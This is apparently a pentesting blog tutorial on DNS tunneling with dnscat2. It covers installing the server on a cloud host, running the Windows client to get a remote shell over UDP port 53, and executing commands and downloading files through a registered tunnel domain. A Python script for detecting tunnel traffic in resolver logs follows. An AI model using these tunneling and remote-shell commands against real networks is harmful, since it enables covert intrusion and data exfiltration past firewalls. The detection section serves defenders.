One of the challenges a pentester faces is communicating through firewalls and IDS from inside a system. DNS tunneling is a very effective technique for getting past this kind of protection mechanism, and dnscat2 is a very popular tool for DNS tunneling.
You can install your dnscat2 server on your own machine or on a machine in the cloud. You can rent a virtual server on Digital Ocean and create an Ubuntu droplet there (you will receive the root password for your droplet by e-mail). After that you can connect to your machine over SSH.
To install the dnscat2 server there, run the following commands:
# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install
If you run into problems when running "bundle install", run the following command and then install the libraries it reports as missing:
gem install rubygems-update
On the client machine (here a Windows client) you can get the dnscat2 client (dnscat2-v0.05-client-win32.zip) from the developer's website.
Now you can start the dnscat2 server with the following command:
After that, when you execute dnscat2.exe on your Windows machine with the following command:
dnscat2.exe --dns server=126.96.36.199,port=53
then you’ll get a shell. Just type:
session -i 1
You'll get calculator.exe running on the Windows machine, and all of this TCP traffic is encapsulated within UDP port 53 traffic.
A better way of running the dnscat2 server is to register a legitimate domain name and set the IP address of the dnscat2 server as its authoritative name server. For this purpose I used makarillo.com and set 188.8.131.52 as its name server.
After that it is possible to run the dnscat2 server with this domain name as a parameter:
ruby ./dnscat2.rb makarillo.com,server=184.108.40.206,port=53
Now all you have to do on the client side is run the tool again with the same domain name:
You will now have a command shell on the client machine. You can list what is in the current directory and then download the files you want:
dnscat2> session -i 1
command (Lab) 1> exec "cmd /c dir>output.txt"
command (Lab) 1> download output.txt
Below you can see screenshots of both the server and client side of dnscat2 running:
First the client side:
And the server side running:
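Since everything above rides on UDP port 53, the resolver logs are where a defender sees this technique: dnscat2 hex-encodes session data into long subdomain labels under the tunnel domain and leans on record types such as TXT, CNAME and MX. The example below is my own addition, not code from the original post or from dnscat2; it scores constructed resolver log lines against those indicators, and the log format, the makarillo.com domain from the walkthrough and the last-two-labels domain split are assumptions.

```python
import math
import re
from collections import defaultdict

# Constructed resolver log lines (not real traffic): "<ts> <client> <qtype> <qname>".
SAMPLE_LOG = """\
1 10.0.0.5 A www.example.com
2 10.0.0.5 TXT 8f1e3c9a4b2d6e7f00112233445566778899aabbccddeeff.makarillo.com
3 10.0.0.5 CNAME a1b2c3d4e5f60718293a4b5c6d7e8f9001122334455667788.makarillo.com
4 10.0.0.7 A mail.example.com
5 10.0.0.5 MX 0011223344556677aabbccddeeff00112233445566778899ab.makarillo.com
6 10.0.0.5 TXT deadbeefcafef00d0123456789abcdeffedcba98765432100.makarillo.com
"""

TUNNEL_QTYPES = {"TXT", "CNAME", "MX"}      # record types dnscat2 favours
HEX_LABEL = re.compile(r"^[0-9a-f]{20,}$")  # long, hex-only subdomain label


def shannon_entropy(s: str) -> float:
    """Bits per character; hex payload labels approach log2(16) = 4.0."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0


def score_domains(log: str) -> dict:
    """Per registered domain (assumed: last two labels): counts and mean label entropy."""
    stats = defaultdict(lambda: {"queries": 0, "hex": 0, "types": 0, "ent": 0.0})
    for line in log.splitlines():
        _ts, _client, qtype, qname = line.split()
        labels = qname.rstrip(".").split(".")
        s = stats[".".join(labels[-2:])]
        s["queries"] += 1
        s["types"] += qtype in TUNNEL_QTYPES                     # tunnel-style record type
        s["hex"] += any(HEX_LABEL.match(lab) for lab in labels[:-2])  # payload-looking label
        s["ent"] += shannon_entropy("".join(labels[:-2]))
    for s in stats.values():
        s["ent"] = round(s["ent"] / s["queries"], 2)   # mean entropy per query
    return dict(stats)


def suspected_tunnels(log: str, min_queries: int = 3) -> list:
    """Domains worth an analyst's look: enough volume, most queries hex + tunnel type."""
    hits = []
    for dom, s in score_domains(log).items():
        if (s["queries"] >= min_queries and s["hex"] >= 0.75 * s["queries"]
                and s["types"] >= 0.75 * s["queries"]):
            hits.append(dom)
    return sorted(hits)
```

On the constructed sample only makarillo.com is flagged; in production the same counters are better kept per source client and time window, since a single host issuing thousands of TXT queries to one domain is the usual tell.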
Keep on digging the rabbit hole :)